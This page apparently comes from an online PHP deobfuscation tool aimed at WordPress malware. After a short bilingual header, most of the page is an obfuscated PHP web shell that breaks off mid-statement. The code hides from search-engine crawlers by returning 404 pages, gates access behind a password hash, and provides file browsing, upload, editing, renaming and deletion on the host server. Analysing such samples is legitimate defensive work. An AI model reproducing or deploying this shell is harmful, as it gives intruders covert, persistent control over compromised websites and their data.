Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
goto SK76W; mkrzv: function hpNH2($nv4MC) { return substr(strrchr($nv4MC, "\x2e"), 1); } goto LeqLB; OkFQi: htbaw: goto xD1gP; D0MOO: foreach ($Fc6gH as $yLMfK) { echo "\40\40\40\40\74\164\x72\x3e\xa\40\40\40\x20\40\40\x3c\x74\144\x3e\x3c\x69\x20\143\x6c\141\x73\163\x3d\47\146\x61\x2d\x73\x6f\x6c\x69\144\40\146\x61\x2d\146\157\154\x64\145\x72\x27\76\74\57\151\76\40\74\x61\x20\150\162\145\146\x3d\x27\77\160\x3d" . urlencode(S9xw9(eokD2 . "\57" . $yLMfK)) . "\x27\76" . $yLMfK . "\74\x2f\x61\x3e\x3c\57\x74\144\76\12\x20\x20\x20\x20\40\x20\74\x74\144\x3e\x3c\x62\76\55\55\55\74\57\x62\76\x3c\x2f\164\144\x3e\xa\x20\40\40\x20\40\x20\74\x74\x64\76" . date("\131\55\155\x2d\x64\x20\110\72\x69\72\x73", filemtime(eokD2 . "\x2f" . $yLMfK)) . "\74\57\x74\144\76\xa\40\x20\x20\40\40\40\74\164\x64\x3e\x30" . substr(decoct(fileperms(eokD2 . "\x2f" . $yLMfK)), -3) . "\74\57\x61\76\x3c\x2f\164\x64\76\xa\40\x20\x20\x20\x20\x20\x3c\x74\x64\x3e\12\40\40\x20\40\40\x20\x3c\141\x20\164\151\164\154\x65\75\x27\x26\x23\63\x37\63\62\x35\73\x26\43\62\x36\60\x33\x32\73\46\43\62\x31\66\x32\x39\x3b\x26\x23\62\61\x35\x31\x37\x3b\x27\40\x68\162\x65\x66\75\x27\x3f\x71\75" . urlencode(s9xw9(eokD2)) . "\46\x72\75" . $yLMfK . "\47\x3e\74\151\x20\x63\x6c\x61\163\163\x3d\x27\146\141\x2d\x73\150\x61\162\x70\x20\x66\x61\x2d\162\x65\147\x75\154\x61\x72\40\x66\141\x2d\x70\145\156\x2d\164\157\55\163\161\165\x61\x72\x65\x27\76\74\x2f\x69\76\x3c\57\x61\76\xa\40\x20\x20\x20\40\40\74\x61\40\164\x69\x74\154\145\x3d\47\x26\x23\62\x31\x30\62\x34\73\46\x23\x33\x38\x35\x30\x30\73\47\40\x68\x72\145\146\x3d\x27\x3f\x71\x3d" . urlencode(S9xW9(eokD2)) . "\x26\144\x3d" . $yLMfK . "\x27\76\74\x69\40\x63\x6c\141\163\x73\x3d\47\146\141\40\x66\141\55\x74\162\141\x73\x68\x27\x20\x61\x72\151\x61\55\150\x69\144\x64\x65\x6e\75\47\164\162\x75\145\47\x3e\74\x2f\151\76\74\57\x61\x3e\xa\x20\x20\x20\x20\40\40\x3c\x74\144\76\xa\x20\40\x20\x20\x3c\57\164\162\x3e\xa"; ewiPT: } goto JiOgE; eoKl1: if (empty($_GET["\x70"])) { goto TRg3V; } goto HORAu; urCxc: $y0dv9 = explode("\x2f", $M2lYd); goto cnJBG; OQ_Ln: $dZxAG = fopen($fGoW4, "\x77"); goto hfxt0; MkVia: if (!(isset($_GET["\144"]) && isset($_GET["\x71"]))) { goto SH5bA; } goto w_eSo; iGZvN: http_response_code(404); goto WshJ7; FOIGr: LL1Jo: goto I1Fgk; zIv0j: WLmfd: goto JDuQ1; Tg5yZ: echo "\12\74\41\x44\117\x43\124\x59\120\x45\x20\x68\164\155\154\x3e\xa\74\150\164\x6d\x6c\x20\x6c\x61\x6e\147\x3d\x22\145\156\42\x3e\12\x3c\x68\145\141\x64\76\xa\x20\x20\40\40\74\155\145\164\x61\40\143\150\141\x72\163\145\x74\x3d\x22\x55\x54\106\x2d\x38\x22\x3e\xa\x20\x20\x20\x20\x3c\155\145\x74\x61\x20\x68\x74\x74\160\55\145\161\165\151\166\x3d\42\x58\55\125\101\x2d\x43\157\x6d\160\x61\x74\x69\142\x6c\145\x22\40\143\157\x6e\x74\145\x6e\164\75\42\111\105\x3d\145\x64\147\x65\42\76\12\x20\x20\40\40\x3c\155\x65\164\141\x20\x6e\x61\155\x65\x3d\42\x76\151\x65\x77\160\157\162\x74\42\40\x63\157\x6e\164\145\x6e\x74\75\42\x77\151\144\x74\150\x3d\x64\145\x76\x69\x63\x65\55\x77\151\x64\x74\x68\54\x20\151\x6e\x69\164\151\141\154\55\x73\143\141\154\x65\75\61\x2e\x30\42\x3e\12\40\40\40\40\74\x6c\x69\x6e\153\x20\x68\x72\145\x66\75\x22\150\x74\x74\160\x73\x3a\x2f\57\x63\x64\x6e\56\x6a\163\x64\145\154\x69\166\x72\x2e\x6e\x65\164\57\x6e\160\155\x2f\142\157\157\x74\x73\164\x72\x61\x70\100\65\x2e\63\x2e\60\x2d\141\x6c\160\x68\141\61\57\x64\x69\163\x74\x2f\143\163\163\57\142\157\157\x74\163\x74\x72\x61\160\x2e\x6d\x69\x6e\56\143\x73\x73\42\x20\x72\x65\x6c\x3d\42\163\x74\171\x6c\x65\x73\150\x65\145\164\x22\12\40\x20\x20\40\40\x20\x20\40\x20\x20\151\156\164\x65\x67\x72\x69\x74\x79\x3d\42\163\150\x61\63\70\x34\55\107\x4c\x68\x6c\124\x51\70\x69\x52\x41\x42\144\132\114\x6c\66\117\x33\x6f\x56\x4d\x57\123\153\164\121\x4f\160\x36\x62\67\x49\x6e\61\x5a\x6c\63\x2f\112\162\65\71\x62\x36\105\x47\107\157\111\61\x61\106\153\x77\67\x63\155\x44\x41\x36\152\x36\x67\x44\x22\x20\143\162\157\x73\x73\157\162\x69\147\x69\156\75\x22\x61\x6e\x6f\156\171\x6d\157\165\163\x22\76\xa\x20\40\40\40\74\x6c\x69\x6e\x6b\x20\x72\145\154\x3d\x22\x73\x74\171\x6c\145\x73\x68\x65\x65\164\x22\x20\150\x72\145\x66\75\x22\x68\164\x74\x70\x73\x3a\57\57\143\144\156\x6a\163\x2e\x63\154\x6f\x75\x64\146\x6c\x61\162\145\56\143\157\155\x2f\x61\152\141\170\x2f\154\151\x62\163\x2f\146\x6f\156\x74\x2d\141\x77\x65\x73\157\155\145\x2f\66\56\x33\56\x30\x2f\143\x73\x73\x2f\x61\154\x6c\56\x6d\x69\x6e\x2e\x63\x73\x73\42\12\x20\40\x20\x20\40\x20\40\40\x20\x20\x69\156\164\x65\x67\162\x69\x74\x79\75\42\163\150\x61\65\x31\x32\x2d\x53\x7a\x6c\x72\x78\127\125\154\160\146\x75\x7a\121\53\x70\x63\x55\103\x6f\163\x78\143\x67\154\121\x52\x4e\x41\x71\x2f\x44\132\152\x56\163\x43\60\154\x45\x34\60\170\163\x41\x44\x73\x66\x65\x51\x6f\x45\x79\160\105\53\x65\x6e\x77\x63\x4f\151\x47\152\153\57\142\123\165\107\107\x4b\x48\105\x79\152\x53\157\121\x31\x7a\126\151\x73\x61\156\x51\x3d\x3d\x22\12\x20\40\40\x20\40\x20\40\40\x20\40\x63\162\157\163\x73\157\x72\x69\147\151\x6e\x3d\x22\141\x6e\157\x6e\x79\155\157\165\163\x22\x20\x72\x65\146\x65\x72\162\x65\162\160\x6f\x6c\x69\x63\x79\75\x22\156\157\55\x72\x65\x66\x65\162\162\x65\162\x22\x20\57\76\xa\74\57\150\x65\141\x64\x3e\xa\74\142\x6f\x64\x79\40\163\164\x79\x6c\x65\x3d\42\40\167\x69\144\x74\150\72\x20\x36\60\x25\73\40\x6d\x61\162\x67\x69\x6e\x3a\40\60\40\x61\165\x74\x6f\73\42\76\12"; goto iz4zE; wuGz9: if (!isset($_POST["\165\x70\154\x6f\x61\x64"])) { goto teZGR; } goto LV6pa; Py40a: echo "\74\x73\x63\x72\x69\160\x74\76\x61\154\x65\162\x74\x28\x27\x46\x69\154\x65\x20\x72\145\x6d\x6f\166\145\x64\56\x27\51\73\x20\x77\151\x6e\144\157\x77\x2e\x6c\157\x63\x61\x74\x69\x6f\156\56\162\x65\160\x6c\x61\x63\145\50\47\x3f\160\75" . S9XW9(eokD2) . "\47\x29\x3b\x3c\57\x73\143\x72\x69\160\x74\76"; goto VvqJS; vkOs4: echo "\74\163\143\x72\x69\x70\164\76\141\x6c\145\162\164\50\x27\123\x6f\155\x65\40\x65\162\x72\x6f\162\x20\157\x63\143\x75\162\162\145\x64\x2e\47\x29\73\x20\167\x69\x6e\x64\x6f\x77\x2e\x6c\x6f\143\141\x74\x69\x6f\156\x2e\x72\145\160\x6c\141\x63\x65\x28\47\77\160\x3d" . S9xw9(eokD2) . "\47\51\x3b\74\57\x73\x63\162\151\x70\164\76"; goto USk22; vaN6s: WaPZf: goto EjNV3; vBDPI: $IWnez = scandir(eokD2); goto rws5k; S06FF: goto DEhzR; goto WI68M; vfjCZ: if (!empty($_GET)) { goto qQCcU; } goto fM3Yg; TA8eH: ED2Dh: goto IRi5L; iz4zE: function hXSp5($yo0qu) { goto stUMS; s7tiI: if ($yo0qu >= 1024) { goto Pq9iA; } goto rlyzp; zL6Yf: goto UF0uz; goto EMFrM; H0wWk: $yo0qu = $yo0qu . "\x20\x62\171\x74\145"; goto JQcW5; JOCBx: $yo0qu = number_format($yo0qu / 1024, 2) . "\40\x4b\102"; goto NJA78; EJJg1: $yo0qu = number_format($yo0qu / 1048576, 2) . "\x20\115\102"; goto mdBPx; OYnZp: $yo0qu = $yo0qu . "\x20\142\x79\164\x65\x73"; goto zL6Yf; JV0VT: yyvVp: goto yoQv0; RPj2h: Pq9iA: goto JOCBx; pvuRl: kCf9o: goto OYnZp; JQcW5: UF0uz: goto oJbWu; rlyzp: if ($yo0qu > 1) { goto kCf9o; } goto VDdPw; mdBPx: goto UF0uz; goto RPj2h; stUMS: if ($yo0qu >= 1073741824) { goto yyvVp; } goto FKWPx; y5Hck: goto UF0uz; goto apdBP; EMFrM: Em02Q: goto H0wWk; NJA78: goto UF0uz; goto pvuRl; ENMAf: goto UF0uz; goto JV0VT; yoQv0: $yo0qu = number_format($yo0qu / 1073741824, 2) . "\40\x47\102"; goto y5Hck; tce5h: $yo0qu = "\x30\x20\142\171\x74\x65\x73"; goto ENMAf; FKWPx: if ($yo0qu >= 1048576) { goto iWZEt; } goto s7tiI; oJbWu: return $yo0qu; goto kgxZz; apdBP: iWZEt: goto EJJg1; VDdPw: if ($yo0qu == 1) { goto Em02Q; } goto tce5h; kgxZz: } goto mkrzv; dnMrg: if (empty($_SERVER["\x48\x54\124\x50\x5f\125\123\x45\x52\137\101\x47\105\116\x54"])) { goto QbsVP; } goto CIMJP; FRIev: jUs2r: goto XhYGx; USk22: goto vLu4S; goto NtGcQ; ZRsMa: $GaQzd = Sppvi($_GET["\161"]); goto TiJUc; I1Fgk: $GaQzd = sppVi($_GET["\160"]); goto Uba7R; Ci3r1: echo "\12\x20\40\x20\x20\x3c\146\x6f\x72\155\x20\x6d\145\164\x68\157\x64\75\x22\160\x6f\163\164\x22\x3e\12\40\x20\x20\40\40\40\40\x20\x3c\x74\145\170\x74\141\x72\145\141\40\163\164\x79\x6c\x65\75\42\x68\145\x69\147\x68\164\72\x20\x35\x30\x30\160\x78\73\xa\x20\x20\x20\40\40\40\40\x20\167\x69\144\x74\x68\x3a\40\61\60\60\x25\x3b\x22\40\x6e\x61\x6d\x65\x3d\x22\x64\141\x74\141\x22\76" . htmlspecialchars(file_get_contents(eokD2 . "\x2f" . $_GET["\x65"])) . "\74\x2f\164\x65\x78\x74\x61\x72\x65\x61\76\xa\x20\40\40\40\x20\40\40\40\74\142\x72\x3e\12\40\x20\40\40\40\x20\x20\x20\74\x69\x6e\x70\165\x74\x20\x74\171\160\x65\75\42\163\x75\142\x6d\x69\164\x22\x20\x63\154\141\163\163\x3d\42\142\x74\x6e\40\142\164\x6e\55\144\141\x72\x6b\42\40\x6e\141\155\145\x3d\42\x65\x64\x69\164\x22\x3e\xa\x20\40\40\x20\74\57\x66\x6f\x72\155\x3e"; goto Wxx6v; MEiME: $M2lYd = str_replace("\134", "\57", eokD2); goto urCxc; bdVve: LNGSj: goto QHZTk; KaKGV: if (!is_dir(sPPVi($_GET["\161"]))) { goto DpCwx; } goto hfaBt; AhaqQ: $ooUvf = $_POST["\x64\141\164\141"]; goto OQ_Ln; DPUpR: $Bt599 = eokD2 . "\57" . $_GET["\x72"]; goto B01JB; woMvi: function s9xW9($M2lYd) { goto h1wee; OSkHb: return str_replace($qeMmT, $ZbfTG, $M2lYd); goto ycPbA; h1wee: $qeMmT = array("\x2f", "\x5c", "\x2e", "\72"); goto SDhkM; SDhkM: $ZbfTG = array("\340\246\x95", "\xe0\246\x96", "\xe0\246\227", "\340\246\230"); goto OSkHb; ycPbA: } goto JvCnY; G2TIq: nlxSZ: goto mRxKR; Pf9oq: BU_sv: goto qzE2V; AomsW: if (isset($_GET["\161"])) { goto pmLOP; } goto d3qr6; Xqh1j: Lce1o: goto hZXth; QHZTk: if (!isset($_GET["\x75\x70\154\x6f\x61\x64"])) { goto Lce1o; } goto Gidoe; XhYGx: echo "\x20\40\74\57\x74\x62\x6f\x64\171\76\xa\x3c\57\x74\x61\142\x6c\x65\76"; goto bdVve; iE_aR: goto JCQH8; goto kLUjv; zvuvd: if (is_dir(SPpVi($_GET["\160"]))) { goto LL1Jo; } goto ETo_N; xD1gP: teZGR: goto MkVia; WvujU: echo "\12\x20\x20\40\40\x3c\146\157\x72\x6d\x20\x6d\145\x74\x68\157\x64\75\42\x70\x6f\163\x74\x22\76\12\x20\40\40\x20\40\x20\x20\x20\x26\43\63\x37\x33\x32\x35\73\46\x23\x32\x36\60\x33\62\x3b\x26\43\62\61\x36\62\71\73\46\x23\x32\61\65\x31\67\73\72\xa\40\40\40\x20\x20\x20\40\x20\x3c\x69\x6e\x70\x75\x74\x20\164\171\x70\x65\75\x22\x74\145\x78\164\42\40\x6e\x61\x6d\145\x3d\x22\156\x61\155\x65\x22\x20\x76\141\x6c\x75\x65\x3d\42" . $_GET["\x72"] . "\x22\76\12\x20\40\40\x20\x20\x20\x20\40\x3c\x69\x6e\x70\165\164\40\164\x79\x70\x65\75\x22\163\x75\142\155\151\x74\x22\x20\x63\x6c\x61\x73\163\75\42\x62\164\x6e\x20\x62\x74\156\x2d\144\x61\162\153\42\40\x6e\141\x6d\x65\x3d\x22\162\x65\156\x61\x6d\x65\x22\x3e\xa\40\x20\40\40\74\57\146\x6f\162\x6d\76"; goto I_ZvX; UfovR: header("\x48\x54\124\x50\x2f\x31\56\60\40\64\x30\x34\40\x4e\157\164\40\x46\x6f\165\x6e\144"); goto ThJjl; Gidoe: echo "\xa\40\x20\40\40\x3c\x66\x6f\x72\x6d\x20\x6d\x65\164\150\157\144\75\x22\160\157\x73\164\x22\40\145\x6e\x63\164\x79\x70\x65\x3d\x22\155\165\154\164\151\x70\x61\x72\164\57\x66\157\162\155\55\x64\x61\x74\x61\x22\76\12\40\40\40\40\46\x23\63\66\70\67\x33\73\x26\x23\x32\x35\x33\x32\x31\73\x26\x23\62\x35\x39\x39\x31\x3b\46\43\62\x30\62\61\x34\73\72\xa\x20\x20\x20\40\x20\x20\40\x20\x3c\151\x6e\160\165\164\40\164\x79\x70\x65\x3d\x22\146\151\154\145\42\40\156\x61\x6d\x65\75\x22\x66\x69\154\x65\124\x6f\x55\160\x6c\x6f\x61\x64\42\x20\151\x64\75\42\x66\x69\154\145\124\157\125\160\x6c\x6f\141\x64\42\76\12\40\x20\x20\x20\40\40\40\x20\74\151\156\x70\165\164\x20\x74\x79\x70\145\75\42\163\165\142\155\151\x74\x22\x20\x63\154\x61\x73\163\75\x22\142\x74\156\x20\142\164\156\x2d\x64\141\x72\153\42\x20\x6e\141\x6d\x65\x3d\42\x75\x70\154\x6f\141\144\42\x3e\xa\40\x20\x20\40\74\x2f\146\x6f\162\155\x3e"; goto Xqh1j; rzTmK: goto P1MGl; goto TgQ4A; G13Mw: XGl2y: goto wuGz9; ctmV4: GJZNJ: goto fLQW9; CDtkz: if (!(!empty($_GET["\162"]) && isset($_GET["\161"]))) { goto MsZNa; } goto WvujU; r5hra: foreach ($IWnez as $KN6jg) { goto EsEpF; J0tTi: ZxCSO: goto FRDUM; ySGzB: if (is_file($km7u_)) { goto xc5z7; } goto GT1SV; c2S3L: if (is_dir($km7u_)) { goto NvY3p; } goto ySGzB; reXbD: pocdD: goto MwZmV; nX_61: array_push($zqNP4, $KN6jg); goto J0tTi; cqUFG: xc5z7: goto nX_61; GT1SV: goto ZxCSO; goto I3eF7; FRDUM: lOkV0: goto MtAJF; LkDj1: goto lOkV0; goto reXbD; EsEpF: if (!($KN6jg == "\56" || $KN6jg == "\56\x2e")) { goto pocdD; } goto LkDj1; aIt6F: array_push($Fc6gH, $KN6jg); goto Hl3bk; Hl3bk: goto ZxCSO; goto cqUFG; I3eF7: NvY3p: goto aIt6F; MwZmV: $km7u_ = eokD2 . "\57" . $KN6jg; goto c2S3L; MtAJF: } goto wC2JI; XmuG1: define("\x65\157\x6b\104\x32", $GaQzd); goto jX7yn; clSWz: foreach ($zqNP4 as $nv4MC) { echo "\x20\40\40\40\74\164\162\76\xa\x20\40\40\x20\40\40\x20\x20\40\40\x3c\164\144\x3e\x3c\141\40\x73\164\x79\154\x65\x3d\x27\164\x65\170\164\x2d\x64\x65\x63\157\x72\x61\x74\151\x6f\x6e\x3a\40\x6e\x6f\x6e\145\73\47\x20\164\151\164\154\145\x3d\x27\x26\x23\x33\x32\x35\x33\64\x3b\46\43\x33\66\67\x35\x33\73\47\x20\150\162\145\x66\75\47\77\x71\x3d" . urlencode(S9xw9(eokD2)) . "\x26\x65\75" . $nv4MC . "\47\76" . bW7eN($nv4MC) . $nv4MC . "\x3c\57\x61\76\74\57\x74\x64\76\xa\40\x20\40\40\40\x20\x20\x20\x20\x20\74\164\144\x3e" . HxsP5(filesize(eokD2 . "\57" . $nv4MC)) . "\74\57\164\144\76\12\x20\40\x20\40\40\x20\x20\40\40\40\74\x74\x64\x3e" . date("\x59\x2d\x6d\55\x64\40\110\x3a\151\x3a\x73", filemtime(eokD2 . "\57" . $nv4MC)) . "\74\x2f\x74\144\x3e\xa\40\40\x20\40\x20\x20\x20\40\40\x20\74\x74\144\x3e\60" . substr(decoct(fileperms(eokD2 . "\x2f" . $nv4MC)), -3) . "\74\x2f\141\x3e\74\x2f\x74\x64\x3e\12\x20\x20\x20\x20\x20\40\x20\x20\40\x20\74\x74\x64\x3e\xa\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x3c\141\40\164\151\164\154\x65\x3d\47\46\43\63\62\x35\x33\x34\73\x26\43\x33\66\x37\65\63\73\47\x20\150\x72\x65\x66\x3d\x27\77\161\75" . urlencode(S9xW9(eokD2)) . "\x26\x65\75" . $nv4MC . "\x27\x3e\x3c\151\x20\143\x6c\x61\163\163\x3d\47\x66\x61\x2d\x73\x6f\154\x69\x64\x20\146\x61\x2d\146\x69\154\145\55\160\145\x6e\47\76\x3c\x2f\151\76\x3c\x2f\141\76\12\x20\x20\40\40\40\40\x20\40\40\40\x3c\x61\x20\x74\151\164\154\145\75\47\x26\43\x33\67\x33\62\x35\73\x26\43\x32\x36\x30\63\62\73\x26\x23\x32\61\x36\62\71\73\x26\43\62\x31\x35\x31\67\73\x27\x20\x68\162\145\146\x3d\47\x3f\161\75" . urlencode(s9XW9(eokD2)) . "\x26\x72\x3d" . $nv4MC . "\x27\x3e\74\x69\40\143\154\x61\163\163\75\47\x66\141\55\x73\150\141\162\160\40\x66\141\55\162\x65\147\165\x6c\141\162\x20\x66\141\55\x70\145\x6e\55\164\157\55\163\161\165\x61\162\145\x27\76\74\57\x69\x3e\x3c\x2f\x61\76\12\x20\40\40\40\x20\40\40\x20\40\x20\74\141\40\164\x69\164\154\x65\75\47\46\x23\x32\61\x30\x32\64\73\46\x23\63\x38\x35\60\60\73\47\40\x68\162\145\x66\75\47\77\x71\x3d" . urlencode(s9Xw9(eokD2)) . "\46\144\x3d" . $nv4MC . "\47\x3e\74\x69\40\x63\154\x61\163\163\x3d\x27\146\141\x20\146\x61\x2d\x74\x72\141\x73\x68\x27\x20\x61\162\x69\x61\x2d\x68\x69\144\144\x65\x6e\75\x27\164\162\165\145\47\x3e\74\57\x69\76\x3c\x2f\141\76\12\x20\x20\x20\x20\x20\40\x20\40\40\x20\x3c\x74\144\x3e\12\40\x20\x20\40\74\x2f\164\x72\76\12"; qAndk: } goto FRIev; IRi5L: if (!is_readable(eokD2)) { goto w2egY; } goto vBDPI; PUxKx: echo "\x3c\163\x63\162\151\160\x74\76\x61\154\x65\x72\164\50\x27\x44\151\162\145\x63\164\157\162\171\40\x72\x65\x6d\x6f\x76\145\144\56\47\x29\x3b\x20\167\151\x6e\144\157\x77\56\154\157\143\141\164\151\x6f\x6e\x2e\162\145\x70\154\141\x63\145\50\x27\x3f\160\x3d" . S9Xw9(eokD2) . "\47\x29\x3b\x3c\x2f\x73\143\162\x69\160\x74\76"; goto mMwwh; jX7yn: echo "\12\x3c\x6e\x61\x76\40\143\154\141\x73\x73\75\42\x6e\x61\166\x62\141\162\40\156\141\166\142\x61\162\x2d\154\x69\147\x68\164\x22\40\163\164\171\x6c\x65\75\42\x62\141\143\x6b\x67\162\157\x75\156\144\55\x63\x6f\x6c\x6f\x72\x3a\x20\x23\x65\x33\x66\62\x66\144\x3b\x22\x3e\12\x20\x20\74\x64\x69\x76\40\x63\154\x61\163\163\x3d\42\x6e\x61\x76\x62\x61\162\55\142\x72\141\156\x64\42\x3e\xa\x20\x20\x3c\x61\x20\x68\162\x65\146\75\42\x3f\42\x3e\74\151\155\147\40\x73\x72\143\x3d\x22\150\164\164\x70\x73\x3a\57\57\x67\151\x74\x68\165\142\56\143\157\155\x2f\146\154\165\151\x64\x69\143\x6f\156\x2e\160\156\147\42\x20\167\151\x64\164\x68\75\x22\63\x30\42\x20\x68\x65\x69\x67\x68\x74\75\42\63\60\x22\40\141\154\x74\x3d\42\x22\76\x3c\57\x61\76\12"; goto MEiME; ppL6d: Q5Dvq: goto YDUQI; ivdaZ: tlCgw: goto GPvES; RCDjY: echo "\74\x73\x63\162\x69\x70\164\x3e\141\154\145\x72\x74\x28\x27\x53\157\x6d\145\40\x65\162\x72\157\x72\x20\x6f\x63\143\165\162\x72\x65\144\x2e\x27\x29\73\x20\x77\x69\156\144\x6f\167\x2e\x6c\x6f\x63\141\x74\x69\157\156\x2e\162\145\x70\x6c\x61\x63\x65\x28\x27\x3f\x70\75" . S9xW9(eokD2) . "\47\51\73\74\57\x73\143\x72\151\160\164\x3e"; goto HeXcs; LIQUO: goto gLSLJ; goto zIv0j; wC2JI: cWm3i: goto l_bM5; jM6M3: wylwX: goto BvPNW; kLUjv: HYQRt: goto Py40a; OzywD: lMJdE: goto XmuG1; zizKH: echo "\74\163\143\x72\151\160\x74\x3e\12\141\154\x65\162\164\x28\x27\104\x69\x72\145\x63\164\157\x72\171\x20\x69\x73\40\103\x6f\162\x72\x75\160\x74\145\x64\x20\x61\156\x64\x20\125\x6e\162\145\141\x64\141\142\x6c\145\56\x27\51\73\12\x77\151\x6e\144\157\167\x2e\154\x6f\143\141\x74\151\157\156\56\x72\145\160\x6c\x61\x63\x65\x28\47\x3f\x27\51\x3b\xa\x3c\57\163\x63\162\151\160\164\76"; goto VlxIz; lc5CJ: $GaQzd = $Qpc5n; goto Z6AhC; JvCnY: function sPPVI($M2lYd) { goto TMMhu; jr3vJ: $ZbfTG = array("\340\xa6\x95", "\340\xa6\226", "\340\xa6\227", "\xe0\246\x98"); goto j1nXv; j1nXv: return str_replace($ZbfTG, $qeMmT, $M2lYd); goto F5LnT; TMMhu: $qeMmT = array("\x2f", "\x5c", "\56", "\72"); goto jr3vJ; F5LnT: } goto p4Jps; CIMJP: $yNQ9q = array("\107\157\x6f\x67\154\145", "\123\154\165\x72\160", "\x4d\x53\116\102\x6f\x74", "\151\x61\x5f\x61\162\x63\150\151\x76\145\x72", "\x59\141\x6e\x64\x65\170", "\122\141\x6d\142\154\145\162"); goto nsq8B; tTCz7: $ptrI3 = true; goto i2YkM; Dad2A: goto lMJdE; goto laYhq; NtGcQ: kufEa: goto d2Fv2; JpO7P: echo "\74\x73\x63\x72\151\x70\164\76\x61\154\x65\x72\x74\50\x27\123\x6f\155\145\x20\145\x72\x72\x6f\x72\40\x6f\143\143\x75\x72\x72\x65\x64\56\x27\x29\73\40\167\x69\x6e\x64\157\x77\x2e\x6c\157\x63\141\x74\151\x6f\156\x2e\x72\x65\x70\x6c\x61\x63\145\50\x27\77\x70\75" . S9xw9(eokD2) . "\x27\51\x3b\x3c\x2f\163\x63\162\151\160\164\76"; goto iE_aR; WshJ7: $Xk5Xh = "\x38\x32\x64\x64\64\x35\141\x63\146\70\x36\141\61\x35\x36\146\67\142\62\67\x66\x66\70\x63\146\x31\x37\x35\x64\143\142\60"; goto dnMrg; HeXcs: goto D3gQ9; goto tlxq1; tlxq1: leDkV: goto m5Mkg; ODBm1: if (is_file($Bt599)) { goto WLmfd; } goto G68I0; ssRos: $fGoW4 = eokD2 . "\x2f" . $_GET["\x65"]; goto AhaqQ; SK76W: error_reporting(0); goto iGZvN; nsq8B: if (!preg_match("\57" . implode("\x7c", $yNQ9q) . "\57\x69", $_SERVER["\x48\x54\124\x50\x5f\x55\123\105\122\x5f\x41\107\x45\x4e\124"])) { goto Q5Dvq; } goto UfovR; CpRpc: Z0fki: goto yWTpO; hZXth: if (!isset($_GET["\x72"])) { goto GJZNJ; } goto CDtkz; p4Jps: $Qpc5n = __DIR__; goto ZJIq1; q08Ts: goto lMJdE; goto HunOf; Z6AhC: goto Otijt; goto vLlIl; VvqJS: JCQH8: goto MSYzA; AbXwl: echo "\x3c\163\x63\162\x69\x70\164\x3e\x77\x69\x6e\x64\x6f\x77\56\x6c\x6f\143\141\x74\151\157\x6e\56\162\145\x70\x6c\x61\143\x65\50\x27\77\160\x3d\47\x29\x3b\x3c\57\163\143\162\151\x70\164\76"; goto S06FF; ddHhl: gLSLJ: goto wWxPW; HORAu: if (!is_dir(sPPvi($_GET["\160"]))) { goto C4lxE; } goto zvuvd; P3q8f: $ptrI3 = true; goto WS7Aa; KUmjD: $zqNP4 = array(); goto r5hra; tkvj4: SfX3W: goto G13Mw; vD4x3: fclose($dZxAG); goto DlXfG; BvPNW: if ($ptrI3) { goto AnVxG; } goto P2bxM; yWTpO: MsZNa: goto ctmV4; l_bM5: w2egY: goto PypQh; fM3Yg: echo "\74\163\x63\162\151\x70\x74\x3e\167\151\x6e\x64\x6f\x77\56\154\x6f\143\141\x74\x69\157\x6e\56\x72\x65\160\x6c\141\x63\x65\50\47\77\x70\75\47\51\x3b\74\57\x73\x63\162\151\160\164\x3e"; goto JHnZb; cnJBG: foreach ($y0dv9 as $gHWBR => $YxYOs) { goto UpQiG; heuEl: DN9qg: goto tFJAy; wDQTS: CPDO7: goto w81PD; Dmb4D: if (!($cuBaN <= $gHWBR)) { goto T9D_l; } goto SdHmt; z0ap1: goto TeDto; goto heuEl; Fgru4: TeDto: goto n8231; j0qfK: goto TeDto; goto wDQTS; fPl3O: echo "\xe0\246\x95"; goto E4Rmi; UpQiG: if (!($YxYOs == '' && $gHWBR == 0)) { goto DN9qg; } goto fVLDF; SdHmt: echo str_replace("\x3a", "\xe0\xa6\230", $y0dv9[$cuBaN]); goto NIPTA; WKAEI: s19DA: goto Dmb4D; N6yV9: echo "\x27\76" . $YxYOs . "\x3c\x2f\x61\x3e\57"; goto Fgru4; BenYY: $cuBaN = 0; goto WKAEI; NIPTA: if (!($cuBaN != $gHWBR)) { goto puvRJ; } goto fPl3O; tFJAy: if (!($YxYOs == '')) { goto CPDO7; } goto j0qfK; GgHNA: tgWtc: goto YcuNE; r7bqD: goto s19DA; goto vIpTR; HRDf6: echo "\x3c\141\x20\x68\x72\x65\146\75\x22\77\160\75\x2f\42\76\57\x3c\x2f\141\x3e"; goto z0ap1; w81PD: echo "\x3c\141\x20\150\162\145\x66\75\x27\x3f\x70\x3d"; goto BenYY; fVLDF: $qeMmT = true; goto HRDf6; YcuNE: $cuBaN++; goto r7bqD; E4Rmi: puvRJ: goto GgHNA; vIpTR: T9D_l: goto N6yV9; n8231: } goto G2TIq; MTDZJ: if (!($_POST["\x70\167\137\x6e\141\155\x65\x5f\x32\x33\x32\65\x36"] == $Xk5Xh)) { goto DuGji; } goto PoptX; G68I0: if (is_dir($Bt599)) { goto RvdtD; } goto LIQUO; VlxIz: goto Otijt; goto FOIGr; nBMLM: RvdtD: goto coFs5; SmUQb: if (move_uploaded_file($_FILES["\146\151\154\145\x54\157\125\160\x6c\157\141\144"]["\x74\155\160\x5f\156\x61\155\x65"], $zd1N7)) { goto BU_sv; } goto n8zDB; JHnZb: qQCcU: goto M7HfI; VgIJy: vLu4S: goto vD4x3; B01JB: if (rename($Bt599, eokD2 . "\57" . $_POST["\156\x61\155\145"])) { goto leDkV; } goto RCDjY; ThJjl: exit; goto ppL6d; TgQ4A: s2INy: goto PUxKx; ustyO: $ptrI3 = false; goto lPKe5; vLlIl: C4lxE: goto zizKH; mRxKR: echo "\xa\x3c\57\144\151\x76\76\xa\74\x64\151\x76\x20\143\x6c\x61\163\x73\x3d\x22\146\x6f\162\x6d\55\x69\156\154\x69\156\145\x22\76\xa\74\141\x20\150\x72\x65\146\x3d\x22\77\165\160\x6c\x6f\141\144\46\x71\x3d" . urlencode(s9Xw9(eokD2)) . 